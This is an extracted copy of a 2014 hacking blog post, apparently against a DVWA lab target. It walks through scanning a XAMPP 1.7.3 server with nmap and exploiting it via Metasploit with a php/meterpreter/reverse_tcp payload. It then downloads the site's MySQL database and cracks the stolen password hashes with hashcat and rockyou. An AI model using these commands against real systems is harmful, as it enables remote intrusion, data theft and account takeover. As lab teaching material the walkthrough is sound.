Professional Documents
Culture Documents
1 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
SupraFortix Blog
"The Internet is becoming the town square for the global village of tomorrow."
(https://suprafortix.wordpress.com/)
Home
(https://suprafortix.wordpress.com/)
Hacking
(https://suprafortix.wordpress.com
Networking
(https://suprafortix.wordpress.com
Series
(https://suprafortix.wordpress.com
Development
(https://suprafortix.wordp
Extra Stuff
/category
/category
/hacking/)
/networking/)/series/)
/category
/category
/development/)
Recent Posts
Network Bandwidth
Checker
(https://suprafortix.wordpress.com
/2015/11/29/networkbandwidth-checker/)
NOVEMBER 29, 2015
Arch Linux as a
Penetration
Testing Platform
(https://suprafortix.wordpress.com
/2014/11/27/arch-linuxpenetration-testingplatform/)
NOVEMBER 27, 2014
AUGUST 5, 2014
Other Sites
Next step includes nding out what type of software the victim
runs as we dont know that at the beginning of the hack. Open up
terminal window in Kali and conduct a Version Nmap scan with the
following piece of code. In this case 192.168.1.7 is the victims IP
address.
Follow
Follow
2/23/2016 3:11 PM
2 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
When the scan returns some data, we can see the victims server
services that are running and the open ports they are
communicating on. However its still not clear what type of the
server it is. A quick Google search of these services will reveal that
the victim is running XAMPP 1.7.3.
(https://www.dropbox.com
/sh/47hw5czeij8og71
/AABBb_OyOczjEVOeETnG65D-a)
(https://twitter.com
/SupraFortix)
(https://sourceforge.net
/u/suprafortix/pro le/)
Search
(https://suprafortix. les.wordpress.com/2014/04/nmap-scan.png)
Services Turned On
Apache httpd 2.2.14
DAV/2
mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
mod_apreq2-20090110/2.7.1
mod_perl/2.0.4 Perl/v5.10.1
XAMPP HACKING
Open another terminal windows and re up msfconsole, and wait
until it loads up and search for XAMPP vulnerabilities in Metasploit
database.
msfconsole starts msfconsole
search xampp searches for XAMPP vulnerabilities
(https://suprafortix. les.wordpress.com/2014/04/xamppsearch.png)
An exploit shows up with a disclosure date of 14/01/2012. This is
perfect as the release date of XAMPP 1.7.3 was 23/12/2009, so the
Follow
Follow
2/23/2016 3:11 PM
3 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
Now search and choose appropriate payload for this hack. In this
example the payload will open a Meterpreter terminal session,
which allows the attacker to view, download and modify les and
directories of victims computer.
show payloads shows all available payloads
set payload php/meterpreter/reverse_tcp sets a particular
payload
(https://suprafortix. les.wordpress.com/2014/04/selectpayload.png)
Now we need to look at the required options to set up to
successfully execute the hack.
show options shows required and non-required options to
set up
We can see that some required rows such as LHOST (local host
attacker) and RHOST (remote host victim) are empty, other
required options such as PATH and RPORT are already lled up by
default.
(https://suprafortix. les.wordpress.com/2014/04/show-optionsarr1.png)
Follow
Follow
2/23/2016 3:11 PM
4 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
The exploit and the payload now have all the necessary
information to conduct the attack.
exploit attempts to exploit the target IP address
(https://suprafortix. les.wordpress.com/2014/04/meterpretercommand-prompt.png)
If pwd (present working directory) command is executed you can
see that the Meterpreter session has been opened in C:\xampp
\webdav directory. The database les of the desired website are
not located in this directory, therefore we need to search for it in
the C:\xampp directory.
cd .. moves to C:\xampp directory
ls shows the content of C:\xampp directory
(https://suprafortix. les.wordpress.com/2014/04/mysqlnd-arr.png)
A directory named mysql is located in C:\xampp\, lets see whats
inside.
Follow
Follow
2/23/2016 3:11 PM
5 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
(https://suprafortix. les.wordpress.com/2014/04/dvwa-dir.png)
To download all database les, the session needs to move outside
of dvwa directory into data directory where the whole database
directory can be downloaded onto the attacker machine.
cd .. moves to C:\xampp\mysql\data\
download dvwa downloads the dvwa directory where the
database les are hidden
(https://suprafortix. les.wordpress.com/2014/04
/downloading.png)
A whole source-code of the website and other system les or
directories can be downloaded, modi ed or deleted or even new
les uploaded, however thats beyond the scope of this post.
PASSWORD CRACKING
The downloaded database directory will be located by default in
\root\ directory on the attackers machine. Open up another
terminal window and go to the downloaded database directory.
The hashed passwords, usernames and le-paths to user pictures
are located in the users.MYD
cat users.MYD shows the contents on users.MYD le.
Follow
Follow
2/23/2016 3:11 PM
6 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
(https://suprafortix. les.wordpress.com/2014/04
/stolenhashes.png)
The tool that is used to crack the hashes in this example is
HashCat with a RockYou hash dictionary, located in
\root\Desktop.
hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop
/rockyou.txt will attempt to nd given hashes in rockyou.txt
dictionary.
(https://suprafortix. les.wordpress.com/2014/04/crackedpasswords-arr.png)
Follow
Follow
2/23/2016 3:11 PM
7 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
(https://suprafortix. les.wordpress.com/2014/04/dvwa-loginpage.png)
SUCCESS!! The attacker now has a complete control over the
administrator account.
(https://suprafortix. les.wordpress.com/2014/04/dvwa-loginpage-in.png)
1.
20
Fantastic Tropical Beaches to Visit 4
Follow
Follow
2/23/2016 3:11 PM
8 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
Share this:
Twitter (https://suprafortix.wordpress.com/2014/04/17/exploitingxampp-v1-7-3/?share=twitter&nb=1)
Facebook (https://suprafortix.wordpress.com/2014/04
/17/exploiting-xampp-v1-7-3/?share=facebook&nb=1)
Google (https://suprafortix.wordpress.com/2014/04/17/exploitingxampp-v1-7-3/?share=google-plus-1&nb=1)
Related
Website Hacking
Environment
(https://supraforti
/2014/03
/23/websitehackingenvironment/)
Hashcat Password
Cracking
(https://supraforti
/2014/06
/13/hashcatpasswordcraking/)
Learning MySQL
(Part II)
(https://supraforti
/2014/06
/28/learningmysql-part-ii/)
Firefox v28.0
XSSVulnerability
ACL Steganography
Leave a Reply
Follow
Follow
2/23/2016 3:11 PM
9 of 9
https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
Follow
Follow
2/23/2016 3:11 PM